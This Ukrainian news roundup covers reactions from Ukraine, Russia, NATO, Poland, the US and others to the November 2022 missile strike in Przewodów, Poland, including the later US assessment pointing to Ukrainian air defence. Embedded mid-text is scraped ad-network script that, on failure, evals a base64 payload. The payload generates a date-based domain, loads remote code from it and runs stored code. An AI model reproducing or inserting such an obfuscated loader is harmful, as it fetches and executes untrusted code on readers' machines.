Чия була ракета: огляд заяв світових лідерів щодо попадання ракети на територію Польші

Вчора, 15 листопада, прем’єр-міністр Польщі Матеуш Моравецький терміново скликав Комітет Ради міністрів з питань національної безпеки і оборони після падіння двох російських ракет у Люблінському воєводстві на фермі в Пшеводові.

Населений пункт знаходить зовім поряд з кордоном України. Ракети влучили в зерносушарки. В результаті удару загинули двоє людей.

Така подія сколихнула всю Європу й США. Польша є членом НАТО, тому попадання ракет можуть сповокувати серйозні наслідки. Однак світові лідери с обережністю роблять заяви з цього приводу.

Реакція України

Українська влада з впевненістю заявила, що ракети, які потрапили на територію Польші, російські.

Поспілкувався з Президентом Польщі Анджеєм Дудою. Висловив співчуття у зв’язку із загибеллю громадян Польщі від російського ракетного терору. Також обговорили наявну інформацію та з’ясовуємо всі факти. Україна, Польща, уся Європа та світ мають бути повністю захищені від держави-терориста, — заявив президент України Володимир Зеленський.

Радник керівника Офісу Президента Михайло Подоляк також заявив, що у тому, що сталося винна тільки Росія.

Як розповів радник ОП Олексій Арестович, він не вірить в те, що Росія спеціально завдала ракетного удару по країні НАТО. Разом з тим, за його словами, члени Альянсу не будуть «піднімати градус».

«Вони (росіяни — ред.) як завжди будуть говорити «це не ми», пішли шляхом заперечення. Все, як завжди. Я впевнений, що країни НАТО скористаються цією паузою для того, щоб не піднімати градус. Воно ж як розмивається? «Зараз проведемо ретельне розслідування, треба встановити всі факти» і так далі. А яка може бути реакція? Удар по російських силах? Не вірю. Безпольотна зона над Україною? Не вірю. Максимум — ультиматум «не стріляєте західніше певної довготи», але тоді виникає питання, чому на всій решті території України повинні гинути люди, а тут не повинні? Це складне політичне рішення», — висловився Арестович.

Реакція Росії

Міністерство оборони Росії заявило, що «не має жодного стосунку» до нібито падіння ракет на території Польщі, в результаті чого загинули дві людини.

«Заяви польських засобів масової інформації та офіційних осіб про нібито падіння «російських» ракет у районі населеного пункту Пшеводув є навмисною провокацією з метою ескалації ситуації», – стверджує російське Міноборони.

Там додають, що РФ не завдавала «жодних ударів» поблизу державного коридору України та Польщі, а опубліковані кадри снарядів у Пшеводуві «не мають жодного стосунку до російських засобів ураження».

Як відреагували в НАТО?

Посли НАТО зустрінуться в середу, 16 листопада, на прохання Польщі на підставі статті 4 Альянсу після влучання російської ракети.

Як повідомили Reuters двоє європейських дипломатів, Альянс діятиме обережно та потребуватиме часу, щоб перевірити, як саме стався інцидент.

Згідно зі статтею 4 установчого договору НАТО, учасники можуть порушувати будь-яке питання, що викликає занепокоєння, особливо щодо безпеки країни-члена.

При цьому літак, який у вівторок пролітав над Польщею, спостерігав за подіями в Україні й відстежив ракету, яка пролітала. Однак поки що не було офіційного повідомлення про те, хто випустив ракету та чия вона.

Реакція Польші

Президент Польщі Анджей Дуда провів телефонну розмову з президентом України Зеленським. Напередодні Анджей Дуда говорив з президентом США Джозефом Байденом і генсеком НАТО Єнсом Столтенбергом.

 Дуда скликає засідання РНБО 16 листопада о 12:00, повідомив голова його адміністрації Шрот. МЗС Республіки Польщі викликало посла РФ у зв’язку з ракетним інцидентом на сході Польщі.

У МЗС Польщі підтвердили, що на їхній території впала ракета російського виробництва.

Уряд Польщі вирішив підвищити боєготовність деяких підрозділів та розглянути можливість застосувати статтю 4 Договору про НАТО.

Реакція США

Світові лідери, які зібралися на зустріч G20 на Балі провели екстрену зустріч у середу після вибухів у Польщі. Як повідомили у Білому домі, зустріч була скликана президентом США Джо Байденом після того, як двоє людей загинули в результаті вибуху в Пшеводові, селі на сході Польщі поблизу кордону з Україною. Про це повідомляє Reuters.

У зустрічі взяли участь лідери США, Німеччини, Канади, Нідерландів, Японії, Іспанії, Італії, Франції та Великобританії. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Усі, крім Японії, — члени НАТО, оборонного Альянсу, до якого також входить Польща.

На початку зустрічі лідерів ненадовго побачили разом за столом переговорів. Байден відповів «ні», коли журналісти запитали, чи може він поділитися тим, що йому відомо про вибух у Польші. Він не став коментувати запитання щодо можливої ​​причетності Росії.

Після цього сьогодні, 16 листопада, Байден назвав «малоймовірним» запуск ракети з Росії по Польщі.

Президент США Джо Байден після екстреної зустрічі зі світовими лідерами на Балі дав коментар журналістам щодо ракетної атаки на Польщу.

Відеокоментар американського лідера опублікував сайт Білого дому, а текст його заяви наводить The Guardian.

Так, Байден назвав «малоймовірним» те, що ракета, яка впала у Польщі, була випущена з Росії. «Я хочу переконатися, що ми точно з’ясуємо те, що сталося… Потім ми визначимося з нашим наступним кроком», — сказав він.

Відповідаючи на запитання, чи була ракета випущена з Росії, Байден сказав:

«Є попередня інформація, яка суперечить цьому. Я не хочу говорити про це, поки ми не проведемо повне розслідування. Але, судячи з траєкторії, малоймовірно, що вона була випущена з Росії, але побачимо».

Також президент США назвав «абсолютно безсовісними» ракетні удари Росії по Україні.

Троє офіційних осіб США заявили Associated Press, що, за попередніми оцінками, ракета була випущена українськими військами по російській ракеті, що наближалася, під час масштабної атаки по енергетичній інфраструктурі України.

Реакції інших країн

Президент Туреччини Реджеп Таїп Ердоган заявив, що США та інші країни говорять про те, що ракета, яка впала в Польщі, не була випущена Росією.

«Я маю поважати заяву Росії. Для нас важливо, що Росія сказала: «Ця справа не має до нас ніякого відношення». Заява Байдена про те, що ракети не російського виробництва, показує, що це не має нічого спільного з Росією. Розслідування має важливе значення», — сказав Ердоган на прес-конференції на саміті G20, передає Anadolu.

МЗС Естонії заявило про солідарність із Польщею.

«Останні новини з Польщі викликають неабияке занепокоєння. Ми тісно консультуємося з Польщею та іншими членами Альянсу. Естонія готова захищати кожен дюйм території НАТО. Ми повністю солідарні з нашим близьким союзником Польщею», – йдеться у повідомленні відомства.

Міністр оборони Латвії Пабрікс засудив наслідки російської ракетної атаки та висловив співчуття Польщі.

«Мої співчуття нашим польським братам по зброї. Злочинний російський режим випустив ракети, що були націлені не лише на українських цивільних, але й приземлилися на території НАТО в Польщі. Латвія повністю солідарна з польськими друзями і засуджує цей злочин», – заявив він.

Президент Євроради Шарль Мішель заявив, що він шокований повідомленнями про вибухи російських ракет на території Польщі.

«Ми – разом з Польщею. Підтримую зв’язок з польською владою, членами Європейської Ради та іншими союзниками», – зазначив він.

Міністр оборони Чехії Яна Чернохова заявила, що наразі тривають всі необхідні перевірки, аби з’ясувати, помилково чи навмисно російська ракета впала у Польщі. (adsbygoogle = window.adsbygoogle || []).push({});

РФ завдала масованої ракетної атаки по Україні: що відбулося Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/chiya-bula-raketa-oglyad-zayav-svitovih-lideriv-shhodo-popadannya-raketi-na-teritoriyu-polshi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top